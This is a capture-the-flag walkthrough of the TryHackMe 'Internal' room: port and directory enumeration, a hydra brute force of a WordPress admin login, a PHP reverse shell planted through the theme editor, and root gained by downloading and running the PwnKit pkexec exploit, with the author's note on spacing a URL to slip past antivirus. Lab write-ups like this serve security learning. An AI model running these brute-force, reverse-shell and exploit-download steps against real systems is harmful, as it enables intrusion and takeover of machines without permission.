Tryhackme - Internal - The Easy Way Walkthrough

<YOU CAN USE THE HARD WAY IF YOU WANT TO>

Goal: Boot to Root

1. Enumerations:

I started the room with a few nmap to make sure that I didn't miss any ports:

┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sN 10.10.158.154
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:16 +07
Nmap scan report for 10.10.158.154 (10.10.158.154)
Host is up (0.23s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE         SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http

Nmap done: 1 IP address (1 host up) scanned in 18.88 seconds
                                                                                
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sN -p- -A --min-rate 8000 -T4 10.10.158.154
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:18 +07

                                                                            
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sN -p- --min-rate 8000 -T4 10.10.158.154 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:18 +07
Nmap scan report for 10.10.158.154 (10.10.158.154)
Host is up (0.23s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE         SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http

Nmap done: 1 IP address (1 host up) scanned in 10.42 seconds
                                                                              
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sS -p- --min-rate 8000 -T4 10.10.158.154
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:19 +07
Nmap scan report for 10.10.158.154 (10.10.158.154)
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 9.97 seconds
                                                                                
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sS -p- --min-rate 8000 -T4 10.10.158.154
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:20 +07
Nmap scan report for 10.10.158.154 (10.10.158.154)
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 12.08 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sV -A -p 22,80 10.10.158.154
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:40 +07
Nmap scan report for internal.thm (10.10.158.154)
Host is up (0.23s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 5 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   96.71 ms  10.17.0.1 (10.17.0.1)
2   ... 4
5   231.19 ms internal.thm (10.10.158.154)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.37 seconds

I also did some ffuf:

┌──(kali㉿kali)-[~]
└─$ ffuf -ic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e '' -u "http://10.10.158.154/FUZZ"           

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.158.154/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

                        [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 1392ms]
blog                    [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 3354ms]
wordpress               [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 221ms]
javascript              [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 218ms]
phpmyadmin              [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 232ms]
                        [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 233ms]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 219ms]
:: Progress: [220547/220547] :: Job [1/1] :: 138 req/sec :: Duration: [0:22:52] :: Errors: 0 ::
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ ffuf -ic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e '.php' -u "http://10.10.158.154/FUZZ"

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.158.154/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.php                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2329ms]
blog                    [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 3314ms]
                        [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 3316ms]
wordpress               [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 229ms]
javascript              [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 231ms]
phpmyadmin              [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 231ms]
                        [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 228ms]
.php                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 228ms]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 218ms]
...
...

See that /blog, /wordpress I immediately visit it, quickly glancing through the source code and also looking into entry points:

From Wappalyzer extension, we could see that the site is using WordPress v5.4.2. I look for funny entries point for this site as well as running a wpscan and a ssh enumeration (I did sqlmap but, figured it wasn't the way):

Nmap and netcat ssh enumeration:

┌──(kali㉿kali)-[~]
└─$ nc -vn 10.10.158.154 22               
(UNKNOWN) [10.10.158.154] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
^C
                                                                                
┌──(kali㉿kali)-[~]
└─$ nmap -p22 10.10.158.154 --script ssh2-enum-algos
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:58 +07
Nmap scan report for internal.thm (10.10.158.154)
Host is up (0.23s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh2-enum-algos: 
|   kex_algorithms: (10)
|       curve25519-sha256
|       curve25519-sha256@libssh.org
|       ecdh-sha2-nistp256
|       ecdh-sha2-nistp384
|       ecdh-sha2-nistp521
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group16-sha512
|       diffie-hellman-group18-sha512
|       diffie-hellman-group14-sha256
|       diffie-hellman-group14-sha1
|   server_host_key_algorithms: (5)
|       ssh-rsa
|       rsa-sha2-512
|       rsa-sha2-256
|       ecdsa-sha2-nistp256
|       ssh-ed25519
|   encryption_algorithms: (6)
|       chacha20-poly1305@openssh.com
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|       aes128-gcm@openssh.com
|       aes256-gcm@openssh.com
|   mac_algorithms: (10)
|       umac-64-etm@openssh.com
|       umac-128-etm@openssh.com
|       hmac-sha2-256-etm@openssh.com
|       hmac-sha2-512-etm@openssh.com
|       hmac-sha1-etm@openssh.com
|       umac-64@openssh.com
|       umac-128@openssh.com
|       hmac-sha2-256
|       hmac-sha2-512
|       hmac-sha1
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com

Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds
                                                                                
┌──(kali㉿kali)-[~]
└─$ nmap -p22 10.10.158.154 --script ssh-hostkey --script-args ssh_hostkey=full
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:59 +07
Nmap scan report for internal.thm (10.10.158.154)
Host is up (0.22s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzpZTvmUlaHPpKH8X2SHMndoS+GsVlbhABHJt4TN/nKUSYeFEHbNzutQnj+DrUEwNMauqaWCY7vNeYguQUXLx4LM5ukMEC8IuJo0rcuKNmlyYrgBlFws3q2956v8urY7/McCFf5IsItQxurCDyfyU/erO7fO02n2iT5k7Bw2UWf8FPvM9/jahisbkA9/FQKou3mbaSANb5nSrPc7p9FbqKs1vGpFopdUTI2dl4OQ3TkQWNXpvaFl0j1ilRynu5zLr6FetD5WWZXAuCNHNmcRo/aPdoX9JXaPKGCcVywqMM/Qy+gSiiIKvmavX6rYlnRFWEp25EifIPuHQ0s8hSXqx5
|   ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMFOI/P6nqicmk78vSNs4l+vk2+BQ0mBxB1KlJJPCYueaUExTH4Cxkqkpo/zJfZ77MHHDL5nnzTW+TO6e4mDMEw=
|_  ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMlxubXGh//FE3OqdyitiEwfA2nNdCtdgLfDQxFHPyY0

Nmap done: 1 IP address (1 host up) scanned in 7.51 seconds
                                                                                
┌──(kali㉿kali)-[~]
└─$ nmap -p22 10.10.158.154 --script ssh-auth-methods --script-args="ssh.user=root"
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 23:00 +07
Nmap scan report for internal.thm (10.10.158.154)
Host is up (0.22s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-auth-methods: 
|   Supported authentication methods: 
|     publickey
|_    password

Nmap done: 1 IP address (1 host up) scanned in 5.14 seconds
...
...

• Explanation:

• nc -vn 10.10.158.154 22: Banner Grabbing

• nmap -p22 10.10.158.154 --script ssh2-enum-algos: Retrieve supported algorythms

• nmap -p22 10.10.158.154 --script ssh-hostkey --script-args ssh_hostkey=full: Retrieve weak keys

• nmap -p22 10.10.158.154 --script ssh-auth-methods --script-args="ssh.user=root": Check authentication methods

After that wpscan:

wpscan --url http://internal.thm/blog/ --enumerate u,ap,at:

This enumerates:

• u → usernames

• ap → all plugins

• at → all themes

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://internal.thm/blog/ --enumerate u,ap,at

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.158.154]
[+] Started: Mon Jun  2 23:11:24 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://internal.thm/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 3.9
 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:25:12 <========================================================================================================================================================> (29685 / 29685) 100.00% Time: 00:25:12
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] twentynineteen
 | Location: http://internal.thm/blog/wp-content/themes/twentynineteen/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 3.1
 | Style URL: http://internal.thm/blog/wp-content/themes/twentynineteen/style.css
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentynineteen/, status: 500
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Aggressive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentynineteen/style.css, Match: 'Version: 1.5'

[+] twentyseventeen
 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 3.9
 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/, status: 500
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Aggressive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 2.3'

[+] twentytwenty
 | Location: http://internal.thm/blog/wp-content/themes/twentytwenty/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.9
 | Style URL: http://internal.thm/blog/wp-content/themes/twentytwenty/style.css
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentytwenty/, status: 500
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentytwenty/style.css, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <==============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jun  2 23:37:01 2025
[+] Requests Done: 29756
[+] Cached Requests: 9
[+] Data Sent: 7.893 MB
[+] Data Received: 5.14 MB
[+] Memory used: 303.816 MB
[+] Elapsed time: 00:25:36

Now I have the admin as username, now I need entry point(s):

Founded.

Now I have tried sql, even sqlmap with not much of a success, I decided not to use Metasploit and go old school with hydra, I captured a request and studied a little:

POST /blog/wp-login.php HTTP/1.1
Host: internal.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://internal.thm/blog/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
Origin: http://internal.thm
Connection: keep-alive
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
Priority: u=0, i

log=a&pwd=a&wp-submit=Log+In&redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&testcookie=1

And the error for inputting wrong password:

Error: The password you entered for the username admin is incorrect

With that I build the command based on hydra command structure:

hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:C=cookies:S=Location'

┌──(kali㉿kali)-[~]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt internal.thm http-post-form "/blog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&testcookie=1:F=incorrect" -q -t 10
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-03 00:32:07
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
...
...
[STATUS] 1327.00 tries/min, 3981 tries in 00:03h, 14340418 to do in 180:07h, 40 active
[80][http-post-form] host: internal.thm   login: admin   password: my2boys
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-03 00:35:29

With that, I'm in, I did some poke around, I tried upload php shell with spoof jpg header:

ÿØÿÛ

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
...
...

Extension uploading, plugins editing but all of them are not writable and they can't be edited. Like Tryhackme - Daily Bugle I tried editing the Themes and Theme Editor:

Setup or netcat and visit http://internal.thm/blog, we got our reverse shell:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444

listening on [any] 4444 ...
connect to [[YOUR IP]] from (UNKNOWN) [10.10.74.67] 41110
Linux internal 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 18:20:15 up 4 min,  0 users,  load average: 0.45, 0.35, 0.17
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@internal:/$ 

2. Privilege Escalation:

www-data@internal:/$ sudo -l
sudo -l
[sudo] password for www-data:
# Well, no sudo -l

www-data@internal:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

# Well, also no crontab

www-data@internal:/$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
       66     40 -rwsr-xr-x   1 root     root        40152 Jan 27  2020 /snap/core/9665/bin/mount
       80     44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /snap/core/9665/bin/ping
       81     44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /snap/core/9665/bin/ping6
       98     40 -rwsr-xr-x   1 root     root        40128 Mar 25  2019 /snap/core/9665/bin/su
      116     27 -rwsr-xr-x   1 root     root        27608 Jan 27  2020 /snap/core/9665/bin/umount
     2605     71 -rwsr-xr-x   1 root     root        71824 Mar 25  2019 /snap/core/9665/usr/bin/chfn
     2607     40 -rwsr-xr-x   1 root     root        40432 Mar 25  2019 /snap/core/9665/usr/bin/chsh
     2683     74 -rwsr-xr-x   1 root     root        75304 Mar 25  2019 /snap/core/9665/usr/bin/gpasswd
     2775     39 -rwsr-xr-x   1 root     root        39904 Mar 25  2019 /snap/core/9665/usr/bin/newgrp
     2788     53 -rwsr-xr-x   1 root     root        54256 Mar 25  2019 /snap/core/9665/usr/bin/passwd
     2898    134 -rwsr-xr-x   1 root     root       136808 Jan 31  2020 /snap/core/9665/usr/bin/sudo
     2997     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 11  2020 /snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3367    419 -rwsr-xr-x   1 root     root              428240 May 26  2020 /snap/core/9665/usr/lib/openssh/ssh-keysign
     6405    109 -rwsr-xr-x   1 root     root              110656 Jul 10  2020 /snap/core/9665/usr/lib/snapd/snap-confine
     7582    386 -rwsr-xr--   1 root     dip               394984 Feb 11  2020 /snap/core/9665/usr/sbin/pppd
       66     40 -rwsr-xr-x   1 root     root               40152 Oct 10  2019 /snap/core/8268/bin/mount
       80     44 -rwsr-xr-x   1 root     root               44168 May  7  2014 /snap/core/8268/bin/ping
       81     44 -rwsr-xr-x   1 root     root               44680 May  7  2014 /snap/core/8268/bin/ping6
       98     40 -rwsr-xr-x   1 root     root               40128 Mar 25  2019 /snap/core/8268/bin/su
      116     27 -rwsr-xr-x   1 root     root               27608 Oct 10  2019 /snap/core/8268/bin/umount
     2665     71 -rwsr-xr-x   1 root     root               71824 Mar 25  2019 /snap/core/8268/usr/bin/chfn
     2667     40 -rwsr-xr-x   1 root     root               40432 Mar 25  2019 /snap/core/8268/usr/bin/chsh
     2743     74 -rwsr-xr-x   1 root     root               75304 Mar 25  2019 /snap/core/8268/usr/bin/gpasswd
     2835     39 -rwsr-xr-x   1 root     root               39904 Mar 25  2019 /snap/core/8268/usr/bin/newgrp
     2848     53 -rwsr-xr-x   1 root     root               54256 Mar 25  2019 /snap/core/8268/usr/bin/passwd
     2958    134 -rwsr-xr-x   1 root     root              136808 Oct 11  2019 /snap/core/8268/usr/bin/sudo
     3057     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 10  2019 /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3427    419 -rwsr-xr-x   1 root     root              428240 Mar  4  2019 /snap/core/8268/usr/lib/openssh/ssh-keysign
     6462    105 -rwsr-sr-x   1 root     root              106696 Dec  6  2019 /snap/core/8268/usr/lib/snapd/snap-confine
     7636    386 -rwsr-xr--   1 root     dip               394984 Jun 12  2018 /snap/core/8268/usr/sbin/pppd
   262330     44 -rwsr-xr-x   1 root     root               43088 Mar  5  2020 /bin/mount
   262361     28 -rwsr-xr-x   1 root     root               26696 Mar  5  2020 /bin/umount
   262265     64 -rwsr-xr-x   1 root     root               64424 Jun 28  2019 /bin/ping
   262214     32 -rwsr-xr-x   1 root     root               30800 Aug 11  2016 /bin/fusermount
   262281     44 -rwsr-xr-x   1 root     root               44664 Mar 22  2019 /bin/su
      880     20 -rwsr-xr-x   1 root     root               18448 Jun 28  2019 /usr/bin/traceroute6.iputils
      592     76 -rwsr-xr-x   1 root     root               75824 Mar 22  2019 /usr/bin/gpasswd
      702     40 -rwsr-xr-x   1 root     root               40344 Mar 22  2019 /usr/bin/newgrp
      703     40 -rwsr-xr-x   1 root     root               37136 Mar 22  2019 /usr/bin/newuidmap
      497     76 -rwsr-xr-x   1 root     root               76496 Mar 22  2019 /usr/bin/chfn
      701     40 -rwsr-xr-x   1 root     root               37136 Mar 22  2019 /usr/bin/newgidmap
      719     60 -rwsr-xr-x   1 root     root               59640 Mar 22  2019 /usr/bin/passwd
      499     44 -rwsr-xr-x   1 root     root               44528 Mar 22  2019 /usr/bin/chsh
      446     52 -rwsr-sr-x   1 daemon   daemon             51464 Feb 20  2018 /usr/bin/at
      844    148 -rwsr-xr-x   1 root     root              149080 Jan 31  2020 /usr/bin/sudo
      739     24 -rwsr-xr-x   1 root     root               22520 Mar 27  2019 /usr/bin/pkexec
     1072     12 -rwsr-xr-x   1 root     root               10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
     7392    100 -rwsr-xr-x   1 root     root              100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
     1258     16 -rwsr-xr-x   1 root     root               14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
     6867    112 -rwsr-xr-x   1 root     root              113528 Jul 10  2020 /usr/lib/snapd/snap-confine
     1254    428 -rwsr-xr-x   1 root     root              436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
     7214     44 -rwsr-xr--   1 root     messagebus         42992 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
www-data@internal:/$ pkexec --version
pkexec --version
pkexec version 0.105

pkexec? again? Like 3 rooms already.

Anyway, let's upload the PwnKit to finish get to root privilege of this machine:

┌──(kali㉿kali)-[~/Downloads]
└─$ curl -fsSL https://raw.githu busercontent.com/ ly4k/P wnKit/ main/PwnKit -o PwnKit #I have Eset Smart Security hunting CVE on my Machine so I have to leave spaces.
┌──(kali㉿kali)-[~/Downloads]
└─$ chmod +x PwnKit
                                                                             
┌──(kali㉿kali)-[~/Downloads]
└─$ python3 -m http.server 80                 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

www-data@internal:/$ cd /tmp
cd /tmp
www-data@internal:/tmp$ wget http://[YOUR IP]:80/PwnKit
wget http://[YOUR IP]:80/PwnKit
--2025-06-02 18:33:35--  http://[YOUR IP]/PwnKit
Connecting to [YOUR IP]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18040 (18K) [application/octet-stream]
Saving to: 'PwnKit'

PwnKit              100%[===================>]  17.62K  74.0KB/s    in 0.2s    

2025-06-02 18:33:36 (74.0 KB/s) - 'PwnKit' saved [18040/18040]

www-data@internal:/tmp$ chmod +x PwnKit
chmod +x PwnKit
www-data@internal:/tmp$ ./PwnKit
./PwnKit
root@internal:/tmp# cd /root 
cd /root
root@internal:~# ls
ls
root.txt  snap
root@internal:~# cat root.txt
cat root.txt
THM{d0XXXXXXXXXXXXXXX #hidden
root@internal:~# cd /
cd /
root@internal:/# ls
ls
bin    dev   initrd.img      lib64       mnt   root  snap      sys  var
boot   etc   initrd.img.old  lost+found  opt   run   srv       tmp  vmlinuz
cdrom  home  lib             media       proc  sbin  swap.img  usr  vmlinuz.old
root@internal:/# cd /home 
cd /home
root@internal:/home# ls
ls
aubreanna
root@internal:/home# cd aubreanna
cd aubreanna
root@internal:/home/aubreanna# ls
ls
jenkins.txt  snap  user.txt
root@internal:/home/aubreanna# cat user.txt
cat user.txt
THM{int3XXXXXXXXXXXXX #hidden
root@internal:/home/aubreanna#